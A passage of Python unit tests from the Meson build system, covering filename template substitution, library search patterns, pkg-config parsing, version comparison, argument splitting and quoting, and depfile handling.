def test_string_templates_substitution(self):
dictfunc = mesonbuild.mesonlib.get_filenames_templates_dict
substfunc = mesonbuild.mesonlib.substitute_values
ME = mesonbuild.mesonlib.MesonException
# Identity
self.assertEqual(dictfunc([], []), {})
# One input, no outputs
inputs = ['bar/foo.c.in']
outputs = []
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0],
'@PLAINNAME@': 'foo.c.in', '@BASENAME@': 'foo.c'}
# Check dictionary
self.assertEqual(ret, d)
# Check substitutions
cmd = ['some', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), cmd)
cmd = ['@INPUT@.out', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), [inputs[0] + '.out'] + cmd[1:])
cmd = ['@INPUT0@.out', '@PLAINNAME@.ok', 'strings']
self.assertEqual(substfunc(cmd, d),
[inputs[0] + '.out'] + [d['@PLAINNAME@'] + '.ok'] + cmd[2:])
cmd = ['@INPUT@', '@BASENAME@.hah', 'strings']
self.assertEqual(substfunc(cmd, d),
inputs + [d['@BASENAME@'] + '.hah'] + cmd[2:])
cmd = ['@OUTPUT@']
self.assertRaises(ME, substfunc, cmd, d)
# One input, one output
inputs = ['bar/foo.c.in']
outputs = ['out.c']
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0],
'@PLAINNAME@': 'foo.c.in', '@BASENAME@': 'foo.c',
'@OUTPUT@': outputs, '@OUTPUT0@': outputs[0], '@OUTDIR@': '.'}
# Check dictionary
self.assertEqual(ret, d)
# Check substitutions
cmd = ['some', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), cmd)
cmd = ['@INPUT@.out', '@OUTPUT@', 'strings']
self.assertEqual(substfunc(cmd, d),
[inputs[0] + '.out'] + outputs + cmd[2:])
cmd = ['@INPUT0@.out', '@PLAINNAME@.ok', '@OUTPUT0@']
self.assertEqual(substfunc(cmd, d),
[inputs[0] + '.out', d['@PLAINNAME@'] + '.ok'] + outputs)
cmd = ['@INPUT@', '@BASENAME@.hah', 'strings']
self.assertEqual(substfunc(cmd, d),
inputs + [d['@BASENAME@'] + '.hah'] + cmd[2:])
# One input, one output with a subdir
outputs = ['dir/out.c']
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0],
'@PLAINNAME@': 'foo.c.in', '@BASENAME@': 'foo.c',
'@OUTPUT@': outputs, '@OUTPUT0@': outputs[0], '@OUTDIR@': 'dir'}
# Check dictionary
self.assertEqual(ret, d)
# Two inputs, no outputs
inputs = ['bar/foo.c.in', 'baz/foo.c.in']
outputs = []
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0], '@INPUT1@': inputs[1]}
# Check dictionary
self.assertEqual(ret, d)
# Check substitutions
cmd = ['some', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), cmd)
cmd = ['@INPUT@', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), inputs + cmd[1:])
cmd = ['@INPUT0@.out', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), [inputs[0] + '.out'] + cmd[1:])
cmd = ['@INPUT0@.out', '@INPUT1@.ok', 'strings']
self.assertEqual(substfunc(cmd, d), [inputs[0] + '.out', inputs[1] + '.ok'] + cmd[2:])
cmd = ['@INPUT0@', '@INPUT1@', 'strings']
self.assertEqual(substfunc(cmd, d), inputs + cmd[2:])
# Many inputs, can't use @INPUT@ like this
cmd = ['@INPUT@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Not enough inputs
cmd = ['@INPUT2@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Too many inputs
cmd = ['@PLAINNAME@']
self.assertRaises(ME, substfunc, cmd, d)
cmd = ['@BASENAME@']
self.assertRaises(ME, substfunc, cmd, d)
# No outputs
cmd = ['@OUTPUT@']
self.assertRaises(ME, substfunc, cmd, d)
cmd = ['@OUTPUT0@']
self.assertRaises(ME, substfunc, cmd, d)
cmd = ['@OUTDIR@']
self.assertRaises(ME, substfunc, cmd, d)
# Two inputs, one output
outputs = ['dir/out.c']
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0], '@INPUT1@': inputs[1],
'@OUTPUT@': outputs, '@OUTPUT0@': outputs[0], '@OUTDIR@': 'dir'}
# Check dictionary
self.assertEqual(ret, d)
# Check substitutions
cmd = ['some', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), cmd)
cmd = ['@OUTPUT@', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), outputs + cmd[1:])
cmd = ['@OUTPUT@.out', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), [outputs[0] + '.out'] + cmd[1:])
cmd = ['@OUTPUT0@.out', '@INPUT1@.ok', 'strings']
self.assertEqual(substfunc(cmd, d), [outputs[0] + '.out', inputs[1] + '.ok'] + cmd[2:])
# Many inputs, can't use @INPUT@ like this
cmd = ['@INPUT@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Not enough inputs
cmd = ['@INPUT2@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Not enough outputs
cmd = ['@OUTPUT2@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Two inputs, two outputs
outputs = ['dir/out.c', 'dir/out2.c']
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0], '@INPUT1@': inputs[1],
'@OUTPUT@': outputs, '@OUTPUT0@': outputs[0], '@OUTPUT1@': outputs[1],
'@OUTDIR@': 'dir'}
# Check dictionary
self.assertEqual(ret, d)
# Check substitutions
cmd = ['some', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), cmd)
cmd = ['@OUTPUT@', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), outputs + cmd[1:])
cmd = ['@OUTPUT0@', '@OUTPUT1@', 'strings']
self.assertEqual(substfunc(cmd, d), outputs + cmd[2:])
cmd = ['@OUTPUT0@.out', '@INPUT1@.ok', '@OUTDIR@']
self.assertEqual(substfunc(cmd, d), [outputs[0] + '.out', inputs[1] + '.ok', 'dir'])
# Many inputs, can't use @INPUT@ like this
cmd = ['@INPUT@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Not enough inputs
cmd = ['@INPUT2@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Not enough outputs
cmd = ['@OUTPUT2@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Many outputs, can't use @OUTPUT@ like this
cmd = ['@OUTPUT@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
def test_needs_exe_wrapper_override(self):
config = ConfigParser()
config['binaries'] = {
'c': '\'/usr/bin/gcc\'',
}
config['host_machine'] = {
'system': '\'linux\'',
'cpu_family': '\'arm\'',
'cpu': '\'armv7\'',
'endian': '\'little\'',
}
# Can not be used as context manager because we need to
# open it a second time and this is not possible on
# Windows.
configfile = tempfile.NamedTemporaryFile(mode='w+', delete=False)
configfilename = configfile.name
config.write(configfile)
configfile.flush()
configfile.close()
opts = get_fake_options()
opts.cross_file = (configfilename,)
env = get_fake_env(opts=opts)
detected_value = env.need_exe_wrapper()
os.unlink(configfilename)
desired_value = not detected_value
config['properties'] = {
'needs_exe_wrapper': 'true' if desired_value else 'false'
}
configfile = tempfile.NamedTemporaryFile(mode='w+', delete=False)
configfilename = configfile.name
config.write(configfile)
configfile.close()
opts = get_fake_options()
opts.cross_file = (configfilename,)
env = get_fake_env(opts=opts)
forced_value = env.need_exe_wrapper()
os.unlink(configfilename)
self.assertEqual(forced_value, desired_value)
def test_listify(self):
listify = mesonbuild.mesonlib.listify
# Test sanity
self.assertEqual([1], listify(1))
self.assertEqual([], listify([]))
self.assertEqual([1], listify([1]))
# Test flattening
self.assertEqual([1, 2, 3], listify([1, [2, 3]]))
self.assertEqual([1, 2, 3], listify([1, [2, [3]]]))
self.assertEqual([1, [2, [3]]], listify([1, [2, [3]]], flatten=False))
# Test flattening and unholdering
holder1 = ObjectHolder(1)
self.assertEqual([holder1], listify(holder1))
self.assertEqual([holder1], listify([holder1]))
self.assertEqual([holder1, 2], listify([holder1, 2]))
self.assertEqual([holder1, 2, 3], listify([holder1, 2, [3]]))
def test_unholder(self):
unholder = mesonbuild.mesonlib.unholder
holder1 = ObjectHolder(1)
holder3 = ObjectHolder(3)
holders = [holder1, holder3]
self.assertEqual(1, unholder(holder1))
self.assertEqual([1], unholder([holder1]))
self.assertEqual([1, 3], unholder(holders))
def test_extract_as_list(self):
extract = mesonbuild.mesonlib.extract_as_list
# Test sanity
kwargs = {'sources': [1, 2, 3]}
self.assertEqual([1, 2, 3], extract(kwargs, 'sources'))
self.assertEqual(kwargs, {'sources': [1, 2, 3]})
self.assertEqual([1, 2, 3], extract(kwargs, 'sources', pop=True))
self.assertEqual(kwargs, {})
# Test unholding
holder3 = ObjectHolder(3)
kwargs = {'sources': [1, 2, holder3]}
self.assertEqual(kwargs, {'sources': [1, 2, holder3]})
# flatten nested lists
kwargs = {'sources': [1, [2, [3]]]}
self.assertEqual([1, 2, 3], extract(kwargs, 'sources'))
def test_pkgconfig_module(self):
dummystate = mock.Mock()
dummystate.subproject = 'dummy'
_mock = mock.Mock(spec=mesonbuild.dependencies.ExternalDependency)
_mock.pcdep = mock.Mock()
_mock.pcdep.name = "some_name"
_mock.version_reqs = []
_mock = mock.Mock(held_object=_mock)
# pkgconfig dependency as lib
deps = mesonbuild.modules.pkgconfig.DependenciesHelper(dummystate, "thislib")
deps.add_pub_libs([_mock])
self.assertEqual(deps.format_reqs(deps.pub_reqs), "some_name")
# pkgconfig dependency as requires
deps = mesonbuild.modules.pkgconfig.DependenciesHelper(dummystate, "thislib")
deps.add_pub_reqs([_mock])
self.assertEqual(deps.format_reqs(deps.pub_reqs), "some_name")
def _test_all_naming(self, cc, env, patterns, platform):
shr = patterns[platform]['shared']
stc = patterns[platform]['static']
shrstc = shr + tuple([x for x in stc if x not in shr])
stcshr = stc + tuple([x for x in shr if x not in stc])
p = cc.get_library_naming(env, LibType.SHARED)
self.assertEqual(p, shr)
p = cc.get_library_naming(env, LibType.STATIC)
self.assertEqual(p, stc)
p = cc.get_library_naming(env, LibType.PREFER_STATIC)
self.assertEqual(p, stcshr)
p = cc.get_library_naming(env, LibType.PREFER_SHARED)
self.assertEqual(p, shrstc)
# Test find library by mocking up openbsd
if platform != 'openbsd':
return
with tempfile.TemporaryDirectory() as tmpdir:
with open(os.path.join(tmpdir, 'libfoo.so.6.0'), 'w') as f:
f.write('')
with open(os.path.join(tmpdir, 'libfoo.so.5.0'), 'w') as f:
f.write('')
with open(os.path.join(tmpdir, 'libfoo.so.54.0'), 'w') as f:
f.write('')
with open(os.path.join(tmpdir, 'libfoo.so.66a.0b'), 'w') as f:
f.write('')
with open(os.path.join(tmpdir, 'libfoo.so.70.0.so.1'), 'w') as f:
f.write('')
found = cc.find_library_real('foo', env, [tmpdir], '', LibType.PREFER_SHARED)
self.assertEqual(os.path.basename(found[0]), 'libfoo.so.54.0')
def test_find_library_patterns(self):
'''
Unit test for the library search patterns used by find_library()
'''
unix_static = ('lib{}.a', '{}.a')
msvc_static = ('lib{}.a', 'lib{}.lib', '{}.a', '{}.lib')
# This is the priority list of pattern matching for library searching
patterns = {'openbsd': {'shared': ('lib{}.so', '{}.so', 'lib{}.so.[0-9]*.[0-9]*', '{}.so.[0-9]*.[0-9]*'),
'static': unix_static},
'linux': {'shared': ('lib{}.so', '{}.so'),
'static': unix_static},
'darwin': {'shared': ('lib{}.dylib', 'lib{}.so', '{}.dylib', '{}.so'),
'static': unix_static},
'cygwin': {'shared': ('cyg{}.dll', 'cyg{}.dll.a', 'lib{}.dll',
'lib{}.dll.a', '{}.dll', '{}.dll.a'),
'static': ('cyg{}.a',) + unix_static},
'windows-msvc': {'shared': ('lib{}.lib', '{}.lib'),
'static': msvc_static},
'windows-mingw': {'shared': ('lib{}.dll.a', 'lib{}.lib', 'lib{}.dll',
'{}.dll.a', '{}.lib', '{}.dll'),
'static': msvc_static}}
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
if is_osx():
self._test_all_naming(cc, env, patterns, 'darwin')
elif is_cygwin():
self._test_all_naming(cc, env, patterns, 'cygwin')
elif is_windows():
if cc.get_argument_syntax() == 'msvc':
self._test_all_naming(cc, env, patterns, 'windows-msvc')
else:
self._test_all_naming(cc, env, patterns, 'windows-mingw')
elif is_openbsd():
self._test_all_naming(cc, env, patterns, 'openbsd')
else:
self._test_all_naming(cc, env, patterns, 'linux')
env.machines.host.system = 'openbsd'
self._test_all_naming(cc, env, patterns, 'openbsd')
env.machines.host.system = 'darwin'
self._test_all_naming(cc, env, patterns, 'darwin')
env.machines.host.system = 'cygwin'
self._test_all_naming(cc, env, patterns, 'cygwin')
env.machines.host.system = 'windows'
self._test_all_naming(cc, env, patterns, 'windows-mingw')
@skipIfNoPkgconfig
def test_pkgconfig_parse_libs(self):
'''
Unit test for parsing of pkg-config output to search for libraries
https://github.com/mesonbuild/meson/issues/3951
'''
def create_static_lib(name):
if not is_osx():
name.open('w').close()
return
src = name.with_suffix('.c')
out = name.with_suffix('.o')
with src.open('w') as f:
f.write('int meson_foobar (void) { return 0; }')
subprocess.check_call(['clang', '-c', str(src), '-o', str(out)])
subprocess.check_call(['ar', 'csr', str(name), str(out)])
with tempfile.TemporaryDirectory() as tmpdir:
pkgbin = ExternalProgram('pkg-config', command=['pkg-config'], silent=True)
env = get_fake_env()
compiler = env.detect_c_compiler(MachineChoice.HOST)
env.coredata.compilers.host = {'c': compiler}
env.coredata.compiler_options.host['c']['link_args'] = FakeCompilerOptions()
p1 = Path(tmpdir) / '1'
p2 = Path(tmpdir) / '2'
p1.mkdir()
p2.mkdir()
# libfoo.a is in one prefix
create_static_lib(p1 / 'libfoo.a')
# libbar.a is in both prefixes
create_static_lib(p1 / 'libbar.a')
create_static_lib(p2 / 'libbar.a')
# Ensure that we never statically link to these
create_static_lib(p1 / 'libpthread.a')
create_static_lib(p1 / 'libm.a')
create_static_lib(p1 / 'libc.a')
create_static_lib(p1 / 'libdl.a')
create_static_lib(p1 / 'librt.a')
def fake_call_pkgbin(self, args, env=None):
if '--libs' not in args:
return 0, '', ''
if args[0] == 'foo':
return 0, '-L{} -lfoo -L{} -lbar'.format(p2.as_posix(), p1.as_posix()), ''
if args[0] == 'bar':
return 0, '-L{} -lbar'.format(p2.as_posix()), ''
if args[0] == 'internal':
return 0, '-L{} -lpthread -lm -lc -lrt -ldl'.format(p1.as_posix()), ''
old_call = PkgConfigDependency._call_pkgbin
old_check = PkgConfigDependency.check_pkgconfig
PkgConfigDependency._call_pkgbin = fake_call_pkgbin
PkgConfigDependency.check_pkgconfig = lambda x, _: pkgbin
# Test begins
try:
kwargs = {'required': True, 'silent': True}
foo_dep = PkgConfigDependency('foo', env, kwargs)
self.assertEqual(foo_dep.get_link_args(),
[(p1 / 'libfoo.a').as_posix(), (p2 / 'libbar.a').as_posix()])
bar_dep = PkgConfigDependency('bar', env, kwargs)
self.assertEqual(bar_dep.get_link_args(), [(p2 / 'libbar.a').as_posix()])
internal_dep = PkgConfigDependency('internal', env, kwargs)
if compiler.get_argument_syntax() == 'msvc':
self.assertEqual(internal_dep.get_link_args(), [])
else:
link_args = internal_dep.get_link_args()
for link_arg in link_args:
for lib in ('pthread', 'm', 'c', 'dl', 'rt'):
self.assertNotIn('lib{}.a'.format(lib), link_arg, msg=link_args)
finally:
# Test ends
PkgConfigDependency._call_pkgbin = old_call
PkgConfigDependency.check_pkgconfig = old_check
# Reset dependency class to ensure that in-process configure doesn't mess up
PkgConfigDependency.pkgbin_cache = {}
PkgConfigDependency.class_pkgbin = PerMachine(None, None)
def test_version_compare(self):
comparefunc = mesonbuild.mesonlib.version_compare_many
for (a, b, result) in [
('0.99.beta19', '>= 0.99.beta14', True),
]:
self.assertEqual(comparefunc(a, b)[0], result)
for (a, b, op) in [
# examples from https://fedoraproject.org/wiki/Archive:Tools/RPM/VersionComparison
("1.0010", "1.9", operator.gt),
("1.05", "1.5", operator.eq),
("1.0", "1", operator.gt),
("2.50", "2.5", operator.gt),
("fc4", "fc.4", operator.eq),
("FC5", "fc4", operator.lt),
("2a", "2.0", operator.lt),
("1.0", "1.fc4", operator.gt),
("3.0.0_fc", "3.0.0.fc", operator.eq),
# from RPM tests
("1.0", "1.0", operator.eq),
("1.0", "2.0", operator.lt),
("2.0", "1.0", operator.gt),
("2.0.1", "2.0.1", operator.eq),
("2.0", "2.0.1", operator.lt),
("2.0.1", "2.0", operator.gt),
("2.0.1a", "2.0.1a", operator.eq),
("2.0.1a", "2.0.1", operator.gt),
("2.0.1", "2.0.1a", operator.lt),
("5.5p1", "5.5p1", operator.eq),
("5.5p1", "5.5p2", operator.lt),
("5.5p2", "5.5p1", operator.gt),
("5.5p10", "5.5p10", operator.eq),
("5.5p1", "5.5p10", operator.lt),
("5.5p10", "5.5p1", operator.gt),
("10xyz", "10.1xyz", operator.lt),
("10.1xyz", "10xyz", operator.gt),
("xyz10", "xyz10", operator.eq),
("xyz10", "xyz10.1", operator.lt),
("xyz10.1", "xyz10", operator.gt),
("xyz.4", "xyz.4", operator.eq),
("xyz.4", "8", operator.lt),
("8", "xyz.4", operator.gt),
("xyz.4", "2", operator.lt),
("2", "xyz.4", operator.gt),
("5.5p2", "5.6p1", operator.lt),
("5.6p1", "5.5p2", operator.gt),
("5.6p1", "6.5p1", operator.lt),
("6.5p1", "5.6p1", operator.gt),
("6.0.rc1", "6.0", operator.gt),
("6.0", "6.0.rc1", operator.lt),
("10b2", "10a1", operator.gt),
("10a2", "10b2", operator.lt),
("1.0aa", "1.0aa", operator.eq),
("1.0a", "1.0aa", operator.lt),
("1.0aa", "1.0a", operator.gt),
("10.0001", "10.0001", operator.eq),
("10.0001", "10.1", operator.eq),
("10.1", "10.0001", operator.eq),
("10.0001", "10.0039", operator.lt),
("10.0039", "10.0001", operator.gt),
("4.999.9", "5.0", operator.lt),
("5.0", "4.999.9", operator.gt),
("20101121", "20101121", operator.eq),
("20101121", "20101122", operator.lt),
("20101122", "20101121", operator.gt),
("2_0", "2_0", operator.eq),
("2.0", "2_0", operator.eq),
("2_0", "2.0", operator.eq),
("a", "a", operator.eq),
("a+", "a+", operator.eq),
("a+", "a_", operator.eq),
("a_", "a+", operator.eq),
("+a", "+a", operator.eq),
("+a", "_a", operator.eq),
("_a", "+a", operator.eq),
("+_", "+_", operator.eq),
("_+", "+_", operator.eq),
("_+", "_+", operator.eq),
("+", "_", operator.eq),
("_", "+", operator.eq),
# other tests
('0.99.beta19', '0.99.beta14', operator.gt),
("1.0.0", "2.0.0", operator.lt),
(".0.0", "2.0.0", operator.lt),
("alpha", "beta", operator.lt),
("1.0", "1.0.0", operator.lt),
("2.456", "2.1000", operator.lt),
("2.1000", "3.111", operator.lt),
("2.001", "2.1", operator.eq),
("2.34", "2.34", operator.eq),
("6.1.2", "6.3.8", operator.lt),
("1.7.3.0", "2.0.0", operator.lt),
("2.24.51", "2.25", operator.lt),
("2.1.5+20120813+gitdcbe778", "2.1.5", operator.gt),
("3.4.1", "3.4b1", operator.gt),
("041206", "200090325", operator.lt),
("0.6.2+git20130413", "0.6.2", operator.gt),
("2.6.0+bzr6602", "2.6.0", operator.gt),
("2.6.0", "2.6b2", operator.gt),
("2.6.0+bzr6602", "2.6b2x", operator.gt),
("0.6.7+20150214+git3a710f9", "0.6.7", operator.gt),
("15.8b", "15.8.0.1", operator.lt),
("1.2rc1", "1.2.0", operator.lt),
]:
ver_a = Version(a)
ver_b = Version(b)
if op is operator.eq:
for o, name in [(op, 'eq'), (operator.ge, 'ge'), (operator.le, 'le')]:
self.assertTrue(o(ver_a, ver_b), '{} {} {}'.format(ver_a, name, ver_b))
if op is operator.lt:
for o, name in [(op, 'lt'), (operator.le, 'le'), (operator.ne, 'ne')]:
self.assertTrue(o(ver_a, ver_b), '{} {} {}'.format(ver_a, name, ver_b))
for o, name in [(operator.gt, 'gt'), (operator.ge, 'ge'), (operator.eq, 'eq')]:
self.assertFalse(o(ver_a, ver_b), '{} {} {}'.format(ver_a, name, ver_b))
if op is operator.gt:
for o, name in [(op, 'gt'), (operator.ge, 'ge'), (operator.ne, 'ne')]:
self.assertTrue(o(ver_a, ver_b), '{} {} {}'.format(ver_a, name, ver_b))
for o, name in [(operator.lt, 'lt'), (operator.le, 'le'), (operator.eq, 'eq')]:
self.assertFalse(o(ver_a, ver_b), '{} {} {}'.format(ver_a, name, ver_b))
def test_msvc_toolset_version(self):
'''
Ensure that the toolset version returns the correct value for this MSVC
'''
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_argument_syntax() != 'msvc':
raise unittest.SkipTest('Test only applies to MSVC-like compilers')
toolset_ver = cc.get_toolset_version()
self.assertIsNotNone(toolset_ver)
# Visual Studio 2015 and older versions do not define VCToolsVersion
# TODO: ICL doesn't set this in the VSC2015 profile either
if cc.id == 'msvc' and int(''.join(cc.version.split('.')[0:2])) < 1910:
return
if 'VCToolsVersion' in os.environ:
vctools_ver = os.environ['VCToolsVersion']
else:
self.assertIn('VCINSTALLDIR', os.environ)
# See https://devblogs.microsoft.com/cppblog/finding-the-visual-c-compiler-tools-in-visual-studio-2017/
vctools_ver = (Path(os.environ['VCINSTALLDIR']) / 'Auxiliary' / 'Build' / 'Microsoft.VCToolsVersion.default.txt').read_text()
self.assertTrue(vctools_ver.startswith(toolset_ver),
msg='{!r} does not start with {!r}'.format(vctools_ver, toolset_ver))
def test_split_args(self):
split_args = mesonbuild.mesonlib.split_args
join_args = mesonbuild.mesonlib.join_args
if is_windows():
test_data = [
# examples from https://docs.microsoft.com/en-us/cpp/c-language/parsing-c-command-line-arguments
(r'"a b c" d e', ['a b c', 'd', 'e'], True),
(r'"ab\"c" "\\" d', ['ab"c', '\\', 'd'], False),
(r'a\\\b d"e f"g h', [r'a\\\b', 'de fg', 'h'], False),
(r'a\\\"b c d', [r'a\"b', 'c', 'd'], False),
(r'a\\\\"b c" d e', [r'a\\b c', 'd', 'e'], False),
# other basics
(r'""', [''], True),
(r'a b c d "" e', ['a', 'b', 'c', 'd', '', 'e'], True),
(r"'a b c' d e", ["'a", 'b', "c'", 'd', 'e'], True),
(r"'a&b&c' d e", ["'a&b&c'", 'd', 'e'], True),
(r"a & b & c d e", ['a', '&', 'b', '&', 'c', 'd', 'e'], True),
(r"'a & b & c d e'", ["'a", '&', 'b', '&', 'c', 'd', "e'"], True),
('a b\nc\rd \n\re', ['a', 'b', 'c', 'd', 'e'], False),
# more illustrative tests
(r'cl test.cpp /O1 /Fe:test.exe', ['cl', 'test.cpp', '/O1', '/Fe:test.exe'], True),
(r'cl "test.cpp /O1 /Fe:test.exe"', ['cl', 'test.cpp /O1 /Fe:test.exe'], True),
(r'cl /DNAME=\"Bob\" test.cpp', ['cl', '/DNAME="Bob"', 'test.cpp'], False),
(r'cl "/DNAME=\"Bob\"" test.cpp', ['cl', '/DNAME="Bob"', 'test.cpp'], True),
(r'cl /DNAME=\"Bob, Alice\" test.cpp', ['cl', '/DNAME="Bob,', 'Alice"', 'test.cpp'], False),
(r'cl "/DNAME=\"Bob, Alice\"" test.cpp', ['cl', '/DNAME="Bob, Alice"', 'test.cpp'], True),
(r'cl C:\path\with\backslashes.cpp', ['cl', r'C:\path\with\backslashes.cpp'], True),
(r'cl C:\\path\\with\\double\\backslashes.cpp', ['cl', r'C:\\path\\with\\double\\backslashes.cpp'], True),
(r'cl "C:\\path\\with\\double\\backslashes.cpp"', ['cl', r'C:\\path\\with\\double\\backslashes.cpp'], False),
(r'cl C:\path with spaces\test.cpp', ['cl', r'C:\path', 'with', r'spaces\test.cpp'], False),
(r'cl "C:\path with spaces\test.cpp"', ['cl', r'C:\path with spaces\test.cpp'], True),
(r'cl /DPATH="C:\path\with\backslashes test.cpp', ['cl', r'/DPATH=C:\path\with\backslashes test.cpp'], False),
(r'cl /DPATH=\"C:\\ends\\with\\backslashes\\\" test.cpp', ['cl', r'/DPATH="C:\\ends\\with\\backslashes\"', 'test.cpp'], False),
(r'cl /DPATH="C:\\ends\\with\\backslashes\\" test.cpp', ['cl', '/DPATH=C:\\\\ends\\\\with\\\\backslashes\\', 'test.cpp'], False),
(r'cl "/DNAME=\"C:\\ends\\with\\backslashes\\\"" test.cpp', ['cl', r'/DNAME="C:\\ends\\with\\backslashes\"', 'test.cpp'], True),
(r'cl "/DNAME=\"C:\\ends\\with\\backslashes\\\\"" test.cpp', ['cl', r'/DNAME="C:\\ends\\with\\backslashes\\ test.cpp'], False),
(r'cl "/DNAME=\"C:\\ends\\with\\backslashes\\\\\"" test.cpp', ['cl', r'/DNAME="C:\\ends\\with\\backslashes\\"', 'test.cpp'], True),
]
else:
test_data = [
(r"'a b c' d e", ['a b c', 'd', 'e'], True),
(r"a/b/c d e", ['a/b/c', 'd', 'e'], True),
(r"a\b\c d e", [r'abc', 'd', 'e'], False),
(r"a\\b\\c d e", [r'a\b\c', 'd', 'e'], False),
(r'"a b c" d e', ['a b c', 'd', 'e'], False),
(r'"a\\b\\c\\" d e', ['a\\b\\c\\', 'd', 'e'], False),
(r"'a\b\c\' d e", ['a\\b\\c\\', 'd', 'e'], True),
(r"'a&b&c' d e", ['a&b&c', 'd', 'e'], True),
(r"a & b & c d e", ['a', '&', 'b', '&', 'c', 'd', 'e'], False),
(r"'a & b & c d e'", ['a & b & c d e'], True),
(r"abd'e f'g h", [r'abde fg', 'h'], False),
('a b\nc\rd \n\re', ['a', 'b', 'c', 'd', 'e'], False),
('g++ -DNAME="Bob" test.cpp', ['g++', '-DNAME=Bob', 'test.cpp'], False),
("g++ '-DNAME=\"Bob\"' test.cpp", ['g++', '-DNAME="Bob"', 'test.cpp'], True),
('g++ -DNAME="Bob, Alice" test.cpp', ['g++', '-DNAME=Bob, Alice', 'test.cpp'], False),
("g++ '-DNAME=\"Bob, Alice\"' test.cpp", ['g++', '-DNAME="Bob, Alice"', 'test.cpp'], True),
]
for (cmd, expected, roundtrip) in test_data:
self.assertEqual(split_args(cmd), expected)
if roundtrip:
self.assertEqual(join_args(expected), cmd)
def test_quote_arg(self):
split_args = mesonbuild.mesonlib.split_args
quote_arg = mesonbuild.mesonlib.quote_arg
if is_windows():
test_data = [
('', '""'),
('arg1', 'arg1'),
('/option1', '/option1'),
('/Ovalue', '/Ovalue'),
('/OBob&Alice', '/OBob&Alice'),
('/Ovalue with spaces', r'"/Ovalue with spaces"'),
(r'/O"value with spaces"', r'"/O\"value with spaces\""'),
(r'/OC:\path with spaces\test.exe', r'"/OC:\path with spaces\test.exe"'),
('/LIBPATH:C:\\path with spaces\\ends\\with\\backslashes\\', r'"/LIBPATH:C:\path with spaces\ends\with\backslashes\\"'),
('/LIBPATH:"C:\\path with spaces\\ends\\with\\backslashes\\\\"', r'"/LIBPATH:\"C:\path with spaces\ends\with\backslashes\\\\\""'),
(r'/DMSG="Alice said: \"Let\'s go\""', r'"/DMSG=\"Alice said: \\\"Let\'s go\\\"\""'),
]
else:
test_data = [
('arg1', 'arg1'),
('--option1', '--option1'),
('-O=value', '-O=value'),
('-O=Bob&Alice', "'-O=Bob&Alice'"),
('-O=value with spaces', "'-O=value with spaces'"),
('-O="value with spaces"', '\'-O=\"value with spaces\"\''),
('-O=/path with spaces/test', '\'-O=/path with spaces/test\''),
('-DMSG="Alice said: \\"Let\'s go\\""', "'-DMSG=\"Alice said: \\\"Let'\"'\"'s go\\\"\"'"),
]
for (arg, expected) in test_data:
self.assertEqual(quote_arg(arg), expected)
self.assertEqual(split_args(expected)[0], arg)
def test_depfile(self):
for (f, target, expdeps) in [
# empty, unknown target
([''], 'unknown', set()),
# simple target & deps
(['meson/foo.o : foo.c foo.h'], 'meson/foo.o', set({'foo.c', 'foo.h'})),
(['meson/foo.o: foo.c foo.h'], 'foo.c', set()),
# get all deps
(['meson/foo.o: foo.c foo.h',
'foo.c: gen.py'], 'meson/foo.o', set({'foo.c', 'foo.h', 'gen.py'})),
(['meson/foo.o: foo.c foo.h',
'foo.c: gen.py'], 'foo.c', set({'gen.py'})),
# line continuation, multiple targets
(['foo.o \\', 'foo.h: bar'], 'foo.h', set({'bar'})),
(['foo.o \\', 'foo.h: bar'], 'foo.o', set({'bar'})),
# \\ handling
(['foo: Program\\ F\\iles\\\\X'], 'foo', set({'Program Files\\X'})),
# $ handling
(['f$o.o: c/b'], 'f$o.o', set({'c/b'})),
(['f$$o.o: c/b'], 'f$o.o', set({'c/b'})),
# cycles
(['a: b', 'b: a'], 'a', set({'a', 'b'})),
(['a: b', 'b: a'], 'b', set({'a', 'b'})),
]:
d = mesonbuild.depfile.DepFile(f)
deps = d.get_all_dependencies(target)
self.assertEqual(deps, expdeps)
def test_log_once(self):
f = io.StringIO()
with mock.patch('mesonbuild.mlog.log_file', f), \
mock.patch('mesonbuild.mlog._logged_once', set()):
mesonbuild.mlog.log_once('foo')
mesonbuild.mlog.log_once('foo')
actual = f.getvalue().strip()
self.assertEqual(actual, 'foo', actual)
def test_log_once_ansi(self):
f = io.StringIO()
with mock.patch('mesonbuild.mlog.log_file', f), \
mock.patch('mesonbuild.mlog._logged_once', set()):
mesonbuild.mlog.log_once(mesonbuild.mlog.bold('foo'))
mesonbuild.mlog.log_once(mesonbuild.mlog.bold('foo'))
actual = f.getvalue().strip()
self.assertEqual(actual.count('foo'), 1, actual)
mesonbuild.mlog.log_once('foo')
actual = f.getvalue().strip()
